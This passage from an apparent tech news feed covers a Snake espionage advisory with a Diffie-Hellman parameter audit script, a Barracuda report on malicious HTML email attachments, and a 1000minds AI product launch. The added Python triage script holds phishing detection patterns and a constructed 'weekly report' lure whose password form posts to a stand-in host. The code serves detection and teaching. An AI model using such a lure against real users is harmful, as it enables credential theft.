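        findings.append(f"prime too short: {bits} bits < {MIN_DH_PRIME_BITS}")
    if not is_probable_prime(p):
        findings.append("modulus p is not prime")
    elif not is_probable_prime((p - 1) // 2):
        findings.append("p is not a safe prime (small-subgroup exposure)")
    if not 2 <= g <= p - 2:
        findings.append("generator g outside [2, p-2]")
    return findings

def constructed_small_prime(bits: int = 128, seed: int = 1) -> int:
    """Deterministic prime of the given size, standing in for what a
    DH_generate_parameters(128, ...) call would yield (constructed sample)."""
    rng = random.Random(seed)
    while True:
        cand = rng.getrandbits(bits) | (1 << (bits - 1)) | 1
        if is_probable_prime(cand):
            return cand

if __name__ == "__main__":
    for finding in audit_dh_params(constructed_small_prime(128), 2):
        print("FINDING:", finding)
```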

Also, in some instances of what appeared to be rushed deployments of Snake, the operators did not strip the Snake binary. This led to the discovery of numerous function names, cleartext strings, and developer comments, as seen in the following figure.


The post ACSC issues joint Advisory on Russian ‘Snake’ Cyber Espionage Tool appeared first on CIO Tech Asia.

Malicious HTML attachments double since 2022 (Sun, 07 May 2023) http://ciotechasia.com/malicious-html-attachments-double-since-2022/

The post Malicious HTML attachments double since 2022 appeared first on CIO Tech Asia.


HTML attacks can be tricky to detect

Businesses in Asia-Pacific could find themselves vulnerable to attack via HTML attachment, as the proportion of malicious files doubles in less than 12 months, according to the most recent Threat Spotlight from Barracuda, a trusted partner and leading provider of cloud-enabled security solutions.

Analysing millions of messages and files scanned by Barracuda’s security technologies in APAC and across the globe, the new report shows how in March 2023 just under half (45.7 per cent) of all HTML attachments scanned by Barracuda were malicious, more than double the proportion (21 per cent) reported in May last year.

HTML stands for Hypertext Markup Language and is used to create and structure content that is displayed online. It is also used in email communication – for example in automated newsletters, marketing materials, and more. In many cases, reports are attached to an email in HTML format (with the file extension .html, .htm or .xhtml, for example). Attackers can successfully leverage HTML as an attack technique in phishing and credential theft or for the delivery of malware.

According to Barracuda’s Threat Spotlight, not only is the overall volume of malicious HTML attachments increasing, but almost a year on from Barracuda’s last report, HTML attachments remain the file type most likely to be used for malicious purposes.

HTML attacks can be tricky to detect, as instead of hackers having to include malicious links in the body of an email, which would be detected, attackers instead work to embed HTML attachments within emails disguised as weekly reports and other generic work email types, as a way to trick users into clicking on phishing links. From there, user credentials can be phished by a third-party machine, whether via a phishing site or a phishing form embedded in the attachment.
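The triage such an attachment needs, as an added example that is not Barracuda's code: the standard-library `email` parser pulls every HTML attachment out of a message and decodes it, then a few indicator rules look for the embedded credential form, the off-host form action and the script-decoded payload the report describes. The "weekly report" lure and the example.invalid addresses are constructed for the demonstration.

```python
# Added example (not Barracuda's code): triage an email's HTML attachments for
# phishing indicators with the standard library; the sample message is constructed.
import re
from email import message_from_string, policy
from email.message import EmailMessage

# Each rule: (finding name, pattern applied to the decoded HTML attachment).
RULES = [
    ("credential form", re.compile(r"<input[^>]+type=['\"]?password", re.I)),
    ("form posts to external host",
     re.compile(r"<form[^>]+action=['\"]?https?://", re.I)),
    ("script decodes hidden payload",
     re.compile(r"\b(atob|unescape|fromCharCode)\s*\(")),
    ("meta or script redirect",
     re.compile(r"http-equiv=['\"]?refresh|location\.(href|replace)", re.I)),
]
HTML_EXT = (".html", ".htm", ".xhtml")

def html_attachments(raw_message: str):
    """Yield (filename, decoded HTML) for each HTML attachment of a message."""
    msg = message_from_string(raw_message, policy=policy.default)
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if (part.get_content_type() in ("text/html", "application/xhtml+xml")
                or name.lower().endswith(HTML_EXT)):
            yield name, part.get_payload(decode=True).decode("utf-8", "replace")

def triage(raw_message: str) -> dict:
    """Map each HTML attachment name to the list of rules that fired on it."""
    return {name: [rule for rule, rx in RULES if rx.search(html)]
            for name, html in html_attachments(raw_message)}

def build_sample_message(malicious: bool = True) -> str:
    """Constructed 'weekly report' lure: the malicious variant hides a login
    form and a decoded payload in the attachment, the benign one does not."""
    html = "<html><body><h1>Weekly Report</h1><p>Revenue up 4%.</p>"
    if malicious:
        html += ("<form action='https://example.invalid/login' method='post'>"
                 "<input name='user'><input type='password' name='pass'></form>"
                 "<script>document.write(atob('PGI+PC9iPg=='))</script>")
    html += "</body></html>"
    msg = EmailMessage()
    msg["From"] = "reports@example.invalid"
    msg["To"] = "finance@example.invalid"
    msg["Subject"] = "Weekly report attached"
    msg.set_content("Please find this week's report attached.")
    # The attachment travels base64-encoded, so a body link scanner sees no URL.
    msg.add_attachment(html.encode(), maintype="text", subtype="html",
                       filename="Weekly_Report.html")
    return msg.as_string()

if __name__ == "__main__":
    for variant in (True, False):
        print("malicious" if variant else "benign", triage(build_sample_message(variant)))
```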

“The security industry has been highlighting the trend of cybercriminals weaponising HTML for years – and evidence suggests it remains a successful and popular attack tool,” said Fleming Shi, Chief Technology Officer, Barracuda.

“Getting the right security in place is as important now as it has ever been. This means having effective, AI-powered email protection in place that can evaluate the content and context of an email beyond scanning links and attachments. Other important elements include implementing robust multifactor authentication or – ideally – Zero Trust Access controls; having automated tools to respond to and remediate the impact of any attack; and training people to spot and report suspicious messages.”

Keeping humans in charge of AI decision-making (Wed, 03 May 2023) http://ciotechasia.com/keeping-humans-in-charge-of-ai-decision-making/

The post Keeping humans in charge of AI decision-making appeared first on CIO Tech Asia.


1000minds uses explicit criteria and explicit human judgments

1000minds has launched an AI assistant as part of its decision-making and conjoint analysis software using Microsoft Azure OpenAI services. OpenAI’s GPT technology is also used in the popular ChatGPT service.

The 1000minds AI assistant helps people build their decision model while keeping them in the driver’s seat, which is incredibly useful for learning how to use 1000minds and for testing its use in new domains.

For example, if people are comparing electric cars, the AI assistant will suggest criteria such as recharge time, speed, safety, and distance, and optionally provide examples of electric cars to consider.

1000minds’ commitment to AI safety best practices, including a “human-in-the-loop” approach, means that people are involved every step of the way. With just a few words about what they want to compare, e.g., “electricity generation options” or “candidates for head of HR”, the AI assistant generates suggestions that people can adapt to meet their needs by incorporating their own knowledge and expertise.

It’s the perfect marriage: 1000minds’ structured decision-making combined with the OpenAI language model, which works well for this kind of application given well-framed prompts designed to get good suggestions.

The AI assistant also supports ideation with 1000minds’ expert group decision-making tools, and builds models for conjoint analysis, discrete choice experiments and preferences surveys.

Unlike “opaque” AI-based decision-making, in which the reasoning behind a decision can’t be fully explained, 1000minds uses explicit criteria and explicit human judgments. This creates a fully auditable, defensible, and refinable decision model that can be trusted.

“Combining 1000minds’ PAPRIKA algorithm and OpenAI’s GPT, two incredible technologies, is a brilliant idea,” said Colin Smithies, Business Intelligence Analyst at Te Herenga Waka – Victoria University of Wellington. “1000minds has always been very powerful and user-friendly, and now getting AI help with specifying the criteria for your decision is extremely helpful. It’s fantastic!”
